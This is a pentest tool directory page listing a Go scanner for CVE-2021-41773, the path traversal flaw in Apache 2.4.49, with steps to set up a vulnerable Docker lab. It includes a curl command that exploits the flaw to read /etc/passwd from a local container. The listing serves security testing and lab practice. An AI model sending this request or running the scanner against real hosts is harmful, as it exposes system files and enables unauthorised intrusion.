Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Scanner-CVE-2021-41773 — A automatic scanner to apache 2.4.49 | Kitploit
Tools/GitHubGitHub/vida003/scanner-cve-2021-41773
Vulnerability ScannersWeb Vulnerability ScannersExploitationWeb SecurityPenetration Testing
GitHubvida003/scanner-cve-2021-41773

Scanner-CVE-2021-41773

A automatic scanner to apache 2.4.49

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Scanner-CVE-2021-41773

A automatic scanner to apache 2.4.49

root@kitploit:~
• run: go run main.go  OR  go build main.go && ./main
• you can customize your payload
• vulnerable hosts are saved

image

root@kitploit:~
Make your lab:
1. Pull Image: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
2. Run Image: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
3. Exploit: curl -v "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
Download Tool